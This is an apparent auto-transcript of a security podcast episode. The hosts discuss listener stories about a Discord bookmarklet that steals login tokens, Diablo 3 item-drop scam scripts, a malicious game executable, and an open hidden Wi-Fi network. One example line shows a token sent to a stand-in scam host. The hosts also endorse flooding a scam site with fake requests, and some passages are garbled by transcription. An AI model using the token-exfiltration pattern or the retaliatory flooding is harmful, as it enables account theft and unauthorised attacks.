Hacked - Hotline Hacked Vol. 11
Episode Date: March 28, 2025
Hacked Discord accounts, zombie emergency alerts on TV, and a crime spree in Diablo 3—just another day. As always, thanks for sharing your calls with us—we had a blast listening. Note: We mention and explain this in the episode, but we’ve pumped the brakes on the ads. Things got overstuffed—that’s on us. Thanks for the honest feedback. Got a strange tale of technology, security, or hacking? Share it at HotlineHacked.com. Hacked is brought to you by Push Security. Check them out at PushSecurity.com. Learn more about your ad choices. Visit podcastchoices.com/adchoices
Transcript
Thank you for calling Hotline Hacked.
Share your strange tale of technology, true hack, or computer confession.
After the beep.
Greetings, sorry for the submission not being audio.
I don't want to reveal my voice, but I still have an interesting story to share.
I think it's more fair to let you two read it instead of using TTS.
Jokes on you. We use TTS anyway.
A friend of mine got phished and his Discord account was stolen.
What's really impressive is that there were four programmers looking at the screen while it happened, and no one suspected anything. How was this possible?
Turns out there is a really clever trick that very few people know about. So, he joined a Discord
server that required verification in a very unique way. He had to open a verification bot site,
which gave him instructions to drag a certain link to his Chrome bookmarks bar. Then he had to
click this bookmark while being in a tab with Discord open, it reloaded,
and he was in.
A half an hour later, his Discord server started advertising crypto scams.
Turns out that this link wasn't actually a link, but a script.
Yeah, I was going to pause and jump in and be like,
I wonder how much malicious JavaScript was embedded in that bookmark that they dragged out.
So I'm assuming that's where this is going.
It would seem a lot, but let's find out.
Let's find out together.
Chrome allows you to drag scripts to your bookmarks bar and execute them by clicking; they call these bookmarklets.
The problem is that these scripts run in the same environment as the current tab, so they have
full access to the web app's memory and can do whatever they want with it.
This particular script extracted the authentication token from Discord's memory and opened
a makeshift API link.
Something like http://scam-site.example/api?token=01234566789 to send it to the server.
I love this. I love that.
Just reading it out loud.
The TTS is showing us like a temporal structure.
So essentially what they're saying is that the JavaScript pulled the token out of the memory
and then jammed it into an API call, which sent the token back to the server.
When I learned about this, I created a simple Python script that opened a ton of these API links from different IPs, and submitted random strings that looked like Discord
authentication tokens, hopefully disrupting the scam. A few days later, the verification site was gone,
though I have no idea if that's standard for scams, or I actually did something. This scam really
shows how important it is for cybersecurity to be informed about new technologies and various quirks,
and to never be 100% confident in your knowledge of tech. Anything that asks you to drag and
drop anything into your bookmarks is probably mucking with you.
Like we have so many ways to verify things these days, you know, double factor,
multi-factor authentication, sending you or texting you codes, like whatever that looks like.
That when something's like, hey, do you mind like putting this code into your browser and
executing it for me?
It's like, yeah, it's like you're probably screwing with something.
Welcome, people.
Thank you for joining us.
It's the call-in show where you can share your strange tale of technology,
true hack or computer confession.
If you want to share your story, go on over to hotlinehacked.com.
Hotline hacked, brought to you by Push Security.
You're going to hear more about them later in the show.
But before we get to that, we got to dig into this caller's call.
Let's dig in.
Okay, so a friend got phished, their Discord credentials got stolen.
The part that was never really explained was the idea that this all occurred
while there were three programmers watching the screen.
I want to understand that situation more
because it sounds like maybe someone bumped into something
and then gathered everybody around to like watch and see what happened.
Like it almost had the vibe of an experiment,
but I can't figure out why you would let that happen
given that the fallout was your Discord server spamming crypto.
The thought that I have is that they were probably programming together
at university or something, everybody's around. They're trying to get access to a Discord server for some purpose, who knows, whether it be gaming, whether it be, you know, all the things people do on Discord these days, which is a lot.
So there was probably just a bunch of them around a single computer and they were just going through the verification steps really quickly. You know, there are a lot of verification systems on Discord these days. So just like ran into a new one that's like, oh, I got to do this weird thing. And it didn't trigger anybody's like, hey,
Maybe there's a reason why they're putting this in a bookmark
because it can execute the code inside of the browser window
because if you click on the link,
it's going to run in the environment of opening a new window
and then boom, probably nothing's going to happen
because it needs to look for specific things in the memory.
So the fact that they had to put it in a bookmark
meant that when it executed it executed on the open tab,
which probably was the Discord,
which then gave it access to all of the information that was currently stored in the state of that tab.
Hmm.
Does that make sense?
I think so.
So a bookmarklet is different from a link in that it can run a little bit of code?
Sure, sure.
A link can also run code.
You can embed JavaScript in links on the websites.
But the difference is that the bookmark probably executes a JavaScript function.
Like imagine you wrote a small JavaScript function that replaced the word "the" with "and" or something.
you could run that on any website by putting that JavaScript function and embedding it into a bookmark.
That makes sense?
Yeah, I think it does.
So essentially, if you open developer tools on a website, you can interact with the JavaScript
and interact with the website DOM entirely through the console.
It's a live living connection you have to it.
So you can jam in or type in or execute or import libraries of JavaScript and execute them
right from the developer tools of an open site.
So the difference between a link and a bookmark
is that the link, I'm assuming,
probably looks to open and execute that code
in a new tab or a new window
or a new sandbox.
Sure.
Where when it's a bookmark,
it probably interacts directly with the open tab
and the sandbox that it's living in.
Oh, and that's how they were able to extract
the authentication token.
Correct.
and get access to the account.
Huh.
So then on the back side of this,
this caller then decides to do a little bit of a flip.
The old switcheroo,
they created a simple Python script to open a ton of these links.
And they said that a few days later,
the verification site was gone.
And they asked the very interesting question of, like,
did this deluge of traffic from their Python script
cause the creators of that spam bot site to take it down?
or is that natural churn
just part of how these things work?
You spin the spam side up,
you let it cook for a couple of days,
then you take it back down,
you move on over.
It's the many, many bank accounts
of the classical criminal enterprise,
but in URL form.
It sounds like this is me hypothesizing,
which I think we're used to here on this show.
But I would suspect that they kind of DoSed them.
Like I would suspect that they wrote a Python script that sent in...
hell yeah, hell yeah.
Rock on.
That they wrote a Python script
that sent in thousands of fake requests,
which essentially would jam up the logic.
It wouldn't jam up the logic,
but it would essentially make it fail
on thousands of entries in the database
because if you imagine it's building a database
of authentication keys
and then leveraging them to push out spam,
all of a sudden those authentication keys start failing.
And instead of getting like a 90% hit rate,
they're getting like a 0.09% hit rate. All of a sudden it's like, well, you know, now we got this headache. Plus they probably
were overrunning it. Like I would be if I was them. If we were looking to DoS them, if they just
stole my thing and turned my Discord account into a spam bot, I'd be looking to counterattack,
I guess. Yeah, sure. You want to get back at them. You want to, you and your three friends
that were watching your other friend get crypto spam bot hacked. You want a little satisfaction.
You open up any of your favorite AI chatbots these days and say, this is an API endpoint, make me a Python script that generates a random number and calls this API endpoint, set authentication token equal to this, and just do it an infinite amount of times.
And you do that off of four computers and all of a sudden there would be a million records at that spam bot endpoint that were garbage.
So the lesson here feels a little bit like, when you are clicking on a link, you're just going to a URL.
Sure, bad stuff can happen, but the browser is still applying its usual security protections.
You can hover over a link and see where it's going.
And there's going to be an extra step to tricking you into executing some dodgy code.
If you drag a bookmark, a little bookmarklet, you're saving like executable, potentially like
JavaScript in your browser and you clicking it later could run the code on whatever page you're
currently on at that moment.
and that could execute a bunch of really dodgy, dodgy shit.
So that lesson is, if anything asks you to make it into a bookmark,
you should probably do a code review as to what you're bookmarking.
Okay.
There you go.
That's a surprisingly nice, clean, simple lesson from that call.
That a bookmarklet drag is a very different action than a link click.
That's good to know.
Yeah, link clicks can be malicious too, but like...
Sure.
Yeah, I would say that there's...
there's probably layers more security being applied,
as well as to have it execute the JavaScript in the same sandbox.
Like if you think of Chrome,
like essentially every tab you open is essentially an independent sandbox.
So to have a link that clicks that interacts with a specific sandbox
would be tougher than having you executing code in that sandbox,
which is what the bookmark click would do.
Learn something new every day, Scott.
That's the point of this show, Jordan, to educate Georgia.
Especially when you make a cybersecurity show and you do not come from that background.
You learn some stuff.
I love it.
Okay, before we move on to the next call, a quick comment about the ad volume.
A quick, quick word from your hosts.
Us.
So full transparency, we have put four mid-roll episode ad spots in the show since we started making it.
They don't always fill up, but it's always been four.
When we got offered what for us as like indie podcasters, the very exciting sponsorship deal,
we didn't correct for that.
So the effect was the episodes got kind of overstuffed with ads.
And no one likes it when a show that they like does that.
That's our bad.
So we're going to pump the brakes with the midroll ads and we're going to be more succinct
with our reads.
So by volume, it's more hanging out telling weird tech tales with your pals and less clicking on that, let's just be frank here, 15-second skip button.
To everyone who took the time to message us or comment saying that we let it get off
track, thank you for taking the time to give some honest feedback.
And thank you for listening.
Jordan and I are, I would say, relatively selective in who we take on as sponsors.
Like we approve or decline.
We decline a lot of potential sponsors.
But we do approve some.
And there was some controversy about some of our recent approvals.
All I'm going to say is erectile dysfunction is a real thing, and I'm okay with us advertising
the people that need that help.
We're going to keep our ad reads nice and clean and succinct, and we're just going to make
sure that there aren't too many of them, and we're going to keep trying to be thoughtful
about what we take on.
Appreciate you all.
Appreciate you all.
Thanks for listening.
And again, genuinely appreciate the honest feedback.
This is a story about Diablo 3 and the infamous era of the real money auction house.
When the game was first launched, Blizzard introduced a system that allowed players to trade in-game items for real currency.
Unlike shady third-party sites, the system was built right into the game and utilized PayPal for real cash transactions.
I love the start of this story already.
Yeah.
This was like, when, I don't know if you remember, but like when World of Warcraft and these things, all the virtual currencies,
like there used to be like essentially an index, like CoinMarketCap, like the site that shows
you like what cryptos are worth. There were like versions of that for in-game currencies.
They like had real world value. That was like market supply-demand commodity tracked. So it's like
I just like where this is going as an economics tech geek. Did people ever short the
in-game currency in those games? I don't know if they ever added derivatives to them,
or options.
That would have been awesome.
Maybe something we should just whip up as a fun game.
Sure.
If I've code it.
There were two types of currency.
Gold, the virtual in-game currency,
and United States dollars that could be cashed out
after Blizzard took their 15% cut.
When I first started,
I played the game legitimately.
I built up a decent character from scratch. At the time, the items were easy to find, still valuable since the market was
just getting started. You could sell a simple sword that you found, and after the 15% cut,
you would get 85 cents in your PayPal account. So I did this for a while, but it was just a
couple bucks for playing the game. One day, I joined a game to make a trade. Somebody was advertising
a stack of a hundred valuable crafting reagents,
probably equal to $100 at the time,
but at a suspiciously low price.
They were offering it for $70.
And this is a commodity,
so it could be cashed out quite easily.
Is this turning into an arbitrage story
about how this guy wrote a bot to arbitrage,
people that posted things for below value?
It's starting to lean that way,
and I'm very intrigued.
Yeah, I like arbitrage.
So this again,
towing me further in. And you love Diablo, so it also, it's all coming together for you.
You know what, truthfully, dungeon crawlers don't do it for me. Don't tell anybody. I'll get some,
get some fire for it.
I agreed to the amount of gold in the trade window and clicked accept.
So my side of the trade window lit up. Instead, I just got one. I was confused as to what was going on
here. When I just had one, the other guy basically said, hey, you want to know how it works
because I just got scammed out of 199 items. What was interesting about this script was that
you would click accept on your side of the window for when they had 100, and then they could
click accept after and only give you one. So it was something broken with the game, and it wasn't
like I mis-saw the screen. So I'm like, yeah, I want to know what the heck's going on. So we got into a
Skype chat. What, what a thing to be like scammed and the immediate response is like,
ha ha, I scammed you. Want to see how I did it? Yeah, you want to see? Yeah, it's, it's, it's,
you can really only do that when you're scamming someone on the internet. Like, if you, if a pool shark
does that, they're going to get hit with a pool cue. It's totally.
I feel like a system,
I feel like this was the foundation
where like in-game trading and stuff
required like an escrow house
to like to settle things out
to make sure that this never happened again.
But let's keep listening.
I don't think they were chatting, but they were typing to me.
They passed me an AU3 file.
Non-executable.
But it was still kind of sketchy.
And I just kind of hung around asking them,
pretending like it didn't work,
or luckily I didn't run it,
because later I found out that when
you ran the script, it would make you drop all your items in the game. Basically, click on the
screen, drag the item to the outside and drop it in the game. And then they would pick up the item.
So like, hey, you want to figure out how I scammed? Do you also run this thing that's going to
scam you even harder? Yeah. It feels like this is barreling towards an even larger scam.
And it's like, oh, he like lured him out with the worm of want to see how I did this. He lured him out
with the worm of do you want to buy $100 gold for $70?
And then a subsequent worm of do you want to see how I did it?
And this call still has many minutes left on it.
So I'm curious how many like Russian nesting dolls of grift this thing goes.
Well, the thing, well, like, the thing I'm waiting for is the turn because I'm assuming
this person fights back at some point.
Let's find out.
So quickly I kind of realized, oh, this is what they're doing.
I was young at the time.
So I didn't really have a moral compass.
So I started kind of doing it myself and that script, the other one where it gave one instead of a hundred of the item, became publicly available online.
So you do it to people or show people it even because eventually people kind of knew that that was out there.
So they wouldn't trade, but you basically show it to them and then go, hey, you can do this too, but you have to give me 10% of whatever you make.
and then instead of giving them that script,
you would give them the script that makes them drop all their stuff
and you'd sell other things
and you'd go after characters in the game that were high-ranked.
So they've created a pyramid scheme of fraud inside of Diablo 3,
but in fact, just like with the Discord one,
to try and verify yourself onto the server,
you're actually just dumping all your stuff and giving it to them.
So it's a scam.
Yeah, I thought they'd created a pyramid scheme,
but it sounds like they didn't even create a pyramid scheme. They said, we've got this bomb-ass pyramid scheme. And then when you like, I don't know,
walk into the pyramid, they're like, we're just kidding. We're just going to beat you up and take your
stuff. We're taking all that gold. You could look up high-ranked characters and then kind of go after
them. And a character could be worth $500 of items at the time. So you could imagine kind of how
lucrative this could be. Not that this was good or I can condone any of this.
So one day I met someone kind of doing the same scheme, but he took it to the next level.
I believe his name was like demand demand or something. So if you're there, if you're listening,
I'd love to chat again. But anyways, this guy was taking it to the next level.
If you're listening, I'd love to hang out, miss you, bud.
I really like the idea that hotline hacked could become a like missed connections for cyber.
crime. You're like, I saw you on the subway. I saw you on the Discord server. Our eyes locked across
the Diablo gold grift in 2012. You just seemed special to me. I stole your, I'm the guy from the
Discord server that stole your Ethereum, wondering what you're up to you these days.
What, a joint pyramid scheme? It was a joint pyramid scheme. Sick. I ended up becoming the recruiter,
finding players who were eager to kind of, there was various different things where you'd set up,
And one of them was people that wanted to run magic find runs.
It was a popular in-game activity where you'd switch to different gear at the very end to maximize the drops in the game.
But anyways, it was something that you could basically convince people.
You'd be like, hey, our friend who's amazing, who's about to join the game, it would be the three of us, meet a man and the target.
And you'd run with four people.
and you'd be like, we're waiting for this guy.
But the magic find gear was such that you would have to have, the whole group would do it,
and then all of you would get better drops.
So we're using this script to swap our gear, and we'd show them like, you got to run this script too.
And eventually we'd get them to run it, and damn, Andaman would just kind of come in at the last moment.
I would get these people warmed up and this one would, man, he had it where I never saw the thing,
but they were connecting to some sort of server and then damn Andaman, we'd see him in game and he'd
send the command to make them drop all their stuff. He was pretty fair about the whole thing,
but he had multiple people finding people for him, I think, and I was just one of those people.
One time I just remember I had my sound loud, and the guy on Skype heard all of his items dropping and started to panic. I don't particularly feel good
about that instance. Once again, I was young and would not do this now. But of course, this couldn't
last forever. Blizzard eventually caught on and accounts started getting banned. That was part of
the reason why like demandman was having such issues, I think too. And why he needed people to recruit
because, yeah, getting to max level to be able to do this took a while, I started asking my friends
for their accounts and offering them $100 to let me use their characters. And then eventually I got
down to like my last character. And I told demandman, if this account gets banned, can you give me
something? And he was like, yeah, I'll give you something, whatever. And to this guy's credit,
like he could have just ditched me, and like he gave me, uh, I can't remember what it was, but he gave
me compensation for like getting my last character banned. Um, and, uh, I, you know, then I would get other
characters, I think, at some point, but eventually it came to the end when like the real money auction
house just like closed entirely and they'd implemented like trade warnings and a whole bunch of things
to make it harder to exploit. During the peak of it,
I think I was making $3,600 a month. I remember definitely days where I would skip work to do this
because I would make more money doing this than going to work. And looking back on it, I don't
feel good about it, but I'll tell you, it was definitely thrilling at the time. They could get
that gear back from contacting Blizzard and getting their items restored.
but I mean, they would lose days of gameplay in the meantime. So yeah, that's my story, hope you enjoyed it.
There's a lot to unpack there. Mostly I'm curious who demand demand was, this like wraith-like
Oliver Twist with the gang of young ne'er-do-wells running around doing crimes for him figure.
Here's a better thing, is that I know a pretty senior programmer who goes by
the moniker of that.
No way.
Yeah.
So I was like, IRL?
I just pulled up his Instagram and was like, could this have been you?
Maybe it was.
Offline.
I'm curious about the spelling because every time the caller said it, it was slightly different.
It was slightly different.
It was slightly different.
Oh, there's a lot to unpack there.
So organized crime.
Yeah.
Diablo 3, 2012, $4,000 a month as like a thug
in the gang.
Yep.
Thrilling, as I'm sure most crime is.
Yeah, I'm intrigued by the escalation of it.
So they start out, they get compromised,
they get invited into the hack.
They realize that the invitation to the hack is itself a hack.
They then start doing that whole thing,
that whole pipeline themselves.
And they come across this demandman figure that offers them this even larger grift of, okay, you're going to take an
account, you're going to form a party, you're going to get all these people into a little community.
It's like a long con and then we're going to do this. It sounds like some kind of a script that gets
people to drop items. I didn't quite catch how mechanically that would work. Yeah, so I'm not knowing
Diablo 3 at all. I have no idea how it would work, but it sounds like they refined it to the point
where it was, it would take over your screen,
show you like a realistic loading screen,
but in the background,
it was like iterating through your characters,
spawning them in world, dumping their inventory,
changing characters, spawning in world, dumping their inventory.
So it's like, doesn't matter which character you were partied up with,
it would just start cycling through all their characters,
dumping everyone's inventory.
Hmm.
And then it became like a loot pool of like, hey, I'm going to take the sword and you can take the shield.
And like, what do you want?
We're going to divvy up all the goods that we got after we.
Sure.
So this person is staring at this loading screen, probably still chatting with them in-game
chatter and Discord like watching or whatever.
Actually, 2012 it wouldn't even have been Discord.
It would have been like one of those early, you know, game chat systems.
Like a forum or something, yeah.
No, no.
There was like a pre-Discord, there was like a really crappy version of Discord, I'm trying to remember
what it's called. It ran on the side of a game and let you chat with everybody, just like you talk
to everybody. Yeah, exactly. Yeah. Um, anyway, but it sounds like they really got into like mass
thievery, and then some honor among thieves moment at the bitter end where he goes to demandman
and says, if my last account, like, I'm just getting, they're starting to lock this down, if my last
account gets banned, will you help me? Will you give me something for the riches I've made you?
Because he's making $3,600 a month, and he's one of these many merry bands of thugs.
Presumably, D'Man de Man was even doing better. And yeah, the demand a man did him right.
Hey, it's like the organized crime when the mafia pays your legal bills when you can finally get
charged. Totally. You finally got out of prison. You got a slick situation waiting for you.
Yeah. I remember reading about Diablo 3's economy. I've never played Diablo 3. But I remember reading about it. A few years ago, I was working on like a small multiplayer indie
game and just going down the rabbit hole of learning about those economies, it is like kind of a
cautionary tale. Diablo 2 had a big black market. And I think in Diablo 3, they wanted to
legitimize that black market. And so to capture all of those transactions, there's like a security
argument to be made, but there's also just a like, hey, if people are going to be making a,
a ton of money by selling stuff in this game.
And it's happening on the black market.
We want our cut.
And it's widely considered like a cautionary tale in that games have since been monetized
in that way to within an inch of their life.
But it was sort of the first instance of that attempt at monetization breaking the
core loop of the game and starting to bias people towards feeling more like a customer
and less like a person going on an adventure.
Since then, a lot of games have fallen into that trap.
But I think it's widely considered like a little bit of a caution.
And that's why they pumped the brakes on it.
They've changed it based on pretty big backlash.
So the thing for me is like the current games, like pay to win is pretty rare,
like where you can buy like O.P guns or swords or whatever.
Like I feel like they've, I feel like they tried that, then that got pushed back because
people were like, no.
People just don't want to play that game.
It's not a fun experience to just get wrecked by someone because they were willing to spend
more than you. Exactly. We're like something like, I'm assuming Diablo and like World
of Warcraft and some of these other games, we're like, if you committed the time to like mine
all the ore and spend 70 real human hours doing absolutely nothing except for game productivity stuff,
you could generate one of these like mystical items which gave you a benefit. And it's like,
okay, like you worked for it, you deserve it. And then it became like the, this thing has a real value.
and somebody who's like, I want to pay to win.
I don't want to spend 70 hours like mining ore and collecting fairy dust to generate this magical shield.
So it's like, it's really tough.
I can see how they got there from like the game designer perspective being like, you know what?
You know what's better than loot boxes?
I was just taking 15% of the cut from everybody.
Yeah, totally.
It's like ticket master.
Ticket master does that.
100%.
And like there's something intuitive about it at the outset.
People pay money for games because games are fun.
The thing that's fun typically about games normally has something to do with friction.
You have to grind through something.
You have to wait for that random reward inside of the box.
There's a little bit of struggle so that when it happens, it feels good.
You've achieved something.
You can circumvent that with money and you get sort of a pale imitation of the feel good.
But in the end, if the money comes from making people have fun and giving you money isn't fun,
you've broken the core loop of these whole things.
And now we're at the,
there's so much more maturity
in the way these systems are designed
where it's like, we need to onboard you
with legitimate fun gameplay.
I'm talking about good games,
not the candy crush whales.
But like, we need to onboard you with the fun.
I mean, the shots fired,
but, and then there can be a layer of monetization underneath it.
Yeah, well, you're seeing like that,
we're off track here.
We're no longer talking about hacking Diablo,
but like the aesthetics,
have become such a big thing.
Like most of these micro transactions are around just simple in-game aesthetics.
I'll take that.
Yeah, same.
I can work with that.
It's like somebody wants to pay 12 bucks.
Yeah, somebody wants to pay 12 bucks to wear a different cape in this open world game.
Like, I don't care.
Like, good for them.
Great.
As long as that.
Support the devs.
Exactly.
That cape doesn't come with like a god mode.
God mode.
Yeah, exactly.
Where like I actually still like the old school, like World of Warcraft, like grinding either
resource capturing
or grinding
going through massive dungeons
to acquire like what were they called?
Come on why how am I slipping on this?
You're talking about like a raid?
Yeah, raids.
Doing massive raids with the like
hope of getting the like 25%
or 10% drop at the end
and it's like 13 of you go in
and like one thing has a 10% chance of dropping
and you spent three hours like perfecting
like fighting this raid out so that you might be able to get something.
Like I like that.
It's a fun loop.
Yeah, it's a fun.
And I also like the fact that it's like,
and if you like get one of those drops,
you can share it, sell it, do whatever with it.
I still like that too.
It just needs to figure out how to balance that in the real world.
Because if some candy crush whale starts playing Diablo
and wants to spend $300 to buy that shield
rather than to level up a character,
level up gameplay capabilities,
and get to the point where they can earn that shield.
Like, I get that.
Like, you know, our economy and society is full of ways to bypass roadblocks with money.
Almost exclusively, you might say.
Like, why would a game be any different?
Yeah.
Well, I mean, on the flip side, if I'm not grinding to earn points that can be converted
back into a cryptocurrency and have the potential of creating an entire cottage industry
of people working under me to make me money, why am I even playing for fun?
Go to hell.
There's a really interesting
side story to all this where it's like
income distribution globally
where like grinding resources in
in some of these games,
these online multiplayer games,
became like a job in countries
where the GDP was really low.
So if the average earned hourly rate was really low,
you could be mining gold
in Malaysia and selling it
in the United States for what would be considered cheap in the States for the amount of
productivity required to get it. But in Malaysia it was like an insane hourly wage. So it's like
you started seeing like internet cafes across like Asia and Africa like filling up with people
who were like grinding in games specifically to sell things to first world countries to then
leverage that like it was a job. And it like paid really well. And it's like to me that's kind of a
cool thing where it's like something that has, I guess, you know, we talk about wasted utility
and maybe that's an argument for it. That might be the purest expression of wasted
utility if we're being honest. It does create like a potential for an icky incentive. I remember I'm
not going to name it right now, but there was a video game. It kind of blew up in about 2021.
And it was the one that I was referring to with the with the crypto thing where in order to monetize
the game effectively, you needed a specific account with a specific type of crypto asset attached to
it that cost a certain amount of money. So all the people in those, exactly, all the people in
those emerging economies that wanted to play the game didn't have the initial capital so they
would have to go to someone. And it was almost like a taxi token type allegory of like, oh,
you want to play this game for money. You got to pay a rent to me because I have the account
that is monetized. And people would build these giant funnels
of just people grinding at a game.
And the game's valuation skyrocketed.
It was sort of like championed as play to earn.
Like it was people loved that.
And yet at the base level,
there didn't seem to be anyone playing this thing for fun.
There was just this toil for digital,
like financial output system going on.
And it was like,
that's fascinating.
We covered that with Zeke in Zeke's interview.
Yeah.
Yeah.
Yeah, I don't know why I'm not saying the name of the game.
Axie Infinity.
But yeah, we covered that extensively.
Yeah, we sure did.
Yeah.
Anyway, I think we should take it over to the ad oasis.
Let's kick it over to some ads.
And when we get back to the other side, we got a couple more calls for you, friends.
We talk a lot about tools, you know, on and off the air.
Some clever, some feel like solutions in search of problems.
But every now and then something shows up that just makes sense for big corporations.
Push security is that kind of tool.
Identity attacks, phishing, credential stuffing, session hijacking, account takeovers.
These are the number one causes of breaches right now.
Most security tools still focus on endpoints, networks, infrastructure.
And meanwhile, the browser, the actual place where people work, has been mostly ignored.
And push changes that.
They built a lightweight browser extension that observes identity activity in real time.
It gives the organization visibility into how identities are being used.
Like when logins skip multi-factor authentication,
or when passwords are being reused,
or when somebody unknowingly enters credentials
into a spoofed login page.
Then, when something risky is detected,
push enforces protections right there in the browser,
no waiting, no help desk tickets.
It's visibility and control directly at the identity layer.
It's not just about prevention.
Push also monitors for real-time threats,
adversary in the middle attacks, stolen session tokens,
even newer techniques like cross-IDP impersonation,
where an attacker bypasses SSO,
and MFA by registering their own identity provider.
If you think about it, it's kind of like endpoint detection response, but for the browser.
And the team behind it, all offensive security pros, they publish really interesting research
in identity attacks, like the SaaS attack matrix, which breaks down exactly how these
kind of threats bypass traditional controls.
You know, identity is the new endpoint, and push is treating it that way.
Check them out at pushsecurity.com.
That's pushsecurity.com.
Hey, guys. My name's Cody.
this is a bit of an interesting tale
similar to the Discord hack
from the first episode of Hotline Hacks
that you guys did which was
fantastic by the way
I unfortunately
wound up falling for one of the
classic scams where
they ask you to test a game
they're using a friend's account
it looks very trustworthy
I ran the executable that I downloaded
and that gave them a door into my Discord information,
which they then proceeded to use to take over.
However, I actually noticed what was happening.
I was still logged in at the time that they were trying to take over my account.
So I actually wound up fighting back,
and once I realized that they had a...
effectively written a script that ran with this executable and placed a file into my computer,
my ancient, regardless of how much I changed it, I turned my computer off, changed everything from
my phone offline, started it back up, removed the files, and actually wound up having a
conversation with the hacker.
While they were determined to try and scam a bunch of money out of people,
asking for like 50 bucks and he would leave me and my friend alone.
I told them where to buy PayPal and it didn't work.
PayPal notified me and blocked the transaction.
I wound up getting the account back without any help from Discord.
I do not know.
And Discord does not seemingly have anyone answering.
Very much for the show, guys.
Keep it up and take care from another fellow Albertan.
Oh, wow.
Hey.
Home town boy.
Welcome from the Rockies.
Thanks for the call, Cody.
Really appreciate it.
I like that we're two for two on Discord revenge story calls.
This is turning into a PSA for Discord.
People on Discord are not trustworthy.
Do not do anything they say and definitely do not execute anything they give you, from Hotline Hacked.
Yeah.
We'll leave that on the website, just sort of lingering there.
like a little safety advisor for people.
So this person's discord gets hacked.
They notice it's happening while it's happening.
They're still logged in.
And so this person decides to just yoink the cable out of the wall.
Very dramatic, very movie moment.
The computer boots down.
They rip over to their phone that the hacker doesn't have access to.
They change all of their login credentials on all of those different accounts that were in one fell swoop all
compromised by the compromise access to the system.
They then go back over to the computer, turn it back on.
Take it offline.
Take it offline.
Pull the Ethernet jack out of the back.
Well, no, it seems like it was still online because they go back over and they're having
a car.
Well, I guess they could have done that on their phone.
I think, yeah, I think like to clean up all the files, the injections that it had left,
I think he said that he took it offline, which means like just like disconnected
from the internet to make sure that if anything's running.
Like a really good idea.
Smart.
Yeah, the number one way to stop a lot.
lot of like network-based attacks is to just rip the network off.
Yeah, sure.
So at some point after that, he reconnects to the internet and resumes this conversation
with this Discord hacker who was friends with him.
That's how we got them, him to run the script.
No, no, no, no, no.
He was having a conversation, we've got a misinterpretation between the two of us here.
It sounds like he finally gets his, cleans his stuff up, changes his cred, gets back
online, and is talking to his friend's account that the hacker is in the,
inside of.
Oh.
So his friend got duped at the same time.
Oh, that's even better.
It just didn't clean it up.
So his,
he's talking to the hacker
who is like essentially masquerading
as his friend.
Oh, it's spooky.
So your friend messages you.
Oh, I like that.
And then we get the like real
pièce de résistance of this whole bad boy,
which is that this was,
I'm going to go ahead and say a teenager
who was trying to drum up $50 for a new gaming PC.
Probably, probably you had ChatGPT write them some authentication token extractor and was looking at ways to leverage it into money. Oh no, just wanted 50 bucks. Got told to stuff it, tried to hit the old PayPal. That is a scary moment. Like we had this conversation, like I'm gonna keep referencing the interview with Adam because it's like we talked about a lot of good stuff in there, but like Discord is essentially a website, right? Like you can load it up in a web browser or
Rudd's fine. If you download the app, the app is literally just like essentially a wrapper for Chrome.
So it's like interacting with Discord is very easy and like I would say accessible programming.
Like you're not really interacting with compiled code and pulling stuff out of like actual memory addresses and things like that.
You can interact with it through like TypeScript and JavaScript, which is like pretty accessible and very easy to code with any form of AI helper.
Yeah.
So I think it's just like really highlighting some of the security vulnerabilities and trust.
Again, this guy sounds like he was hoping on getting some beta version of a game
or something that he wanted early access to.
And he pushed his trust aside to, you know, hopefully get a larger return of like dopamine
from like getting something early.
And it just led to what probably was like a stressful and furious, you know,
afternoon. Yeah. He, the like speed in which he just recognized, okay, they're in the system,
so I'm going to turn it off. I'm going to immediately go change all of those credentials. And then when I
come back, I'm going to disconnect from the internet, clean all this crap out. And then I can go have
a conversation with my friends account being puppeted by the person that just hacked me for $50.
It's great. It's a good, it's a good, good little yarn. The, uh, yeah, the, the, the,
Like, whenever I hear stories like this, I'm just so thankful it wasn't like, like, BitLocker or something.
Like, something that was like, it's like, oh, yeah, they got into my, I ran this executable and I like turned the power off on my computer as my hard drive was being encrypted in front of my face.
And I was going to be like ransomware it up.
Yeah, sure.
So I'm at least it was only like, oh, we grabbed, like, I'm sure it took him a long time to go and reset passwords to all of his accounts, you know.
Yeah.
Good, good argument for a password manager there.
Yeah, seriously.
but yeah.
Fascinating one.
Anyway, local boy too.
Local boy.
Keeping Discord locked down in Alberta.
Hello,
I'm listening to your show,
and I've really been enjoying it,
and I've just lived in episode four
and figured this might be a fun one for you guys.
It's kind of a small story,
but I was at an exposition
last year for Ham Radio, actually,
and it was a fun exposition.
I love those things,
lots of smart people there.
From where my booth was,
was a little restaurant.
They had a bunch of TVs.
It had a bunch of, part of the demo.
Logged into that one.
Nice them as the TV, all the TVs that were on.
So I looked on there, and I kind of didn't see anything interesting, but then I had an idea.
It found a, uh, what's going on.
You know, it was like a minute of spending, but we're doing the show guys, really
enjoying that episode.
Well, thanks for listening.
Yeah, we appreciate it.
Thanks for calling in with the story.
I love a ham radio, an amateur radio aficionado, which for anyone that doesn't know,
that's what ham radio is.
Um, I love me some conference hijinks.
Totally. I think that's like the bane of DefCon is the conference hijinks, like they just make such an infrastructure impact.
Yeah, the amount of, so worried about it, warning that you get before you go there about turning off all the devices.
I'm curious, everything you have, it's like lock it down, turn off every radio antenna.
Well, this is a good PSA because there's a lot of people out there I think that
think if they check the you know hidden SSID like it's non-broadcasting like when you
open up say you're on like Windows
or Mac and you look at like networks around you, you can opt out of that list, but it doesn't
mean that your Wi-Fi doesn't exist.
Right.
It takes very few seconds and not even like a hardcore tool to find all of those hidden SSIDs.
So especially if you've got one that's unencrypted, unlocked down, open, you're just asking
for invaders.
Thankfully, it was just a bunch of smart TVs that I think he mentioned that he
updated them, right?
I think you said that YouTube had to update before he could work.
So YouTube would have had to have run a little update on the televisions before it would have.
So he actually maintained their equipment.
You did them a favor.
So the fun conference hijinks, I do think that that is like a good, like if we're making a PSA out of each one of these calls, the one there is like do not, if you're hiding your SSID and you think that's some.
form of security, it is not security against the people that you need to be worried about.
Might be security against your neighbor, like jumping on or trying to like get on it to like
download stuff.
Yeah, sure.
But it's not going to prevent anybody that knows anything about anything.
But in this, in this analog, and correct me if I'm wrong here, it isn't stopping the network,
it isn't making the network more or less secure, just stopping it from being advertised.
Theoretically, that network should have still had some kind of password on it.
that stops the person from connecting to the smart TV.
So maybe it was, that's a weird overlap of things where like it's unprotected,
but we've removed the SSID so that it's hidden.
It's like, oh, that's, it's like you left the door wide unlocked,
but good luck finding it.
It's like, oh, it's quite easy to find this door in this analogy.
But when you kind of set up a bunch of TVs and you need to tell your staff
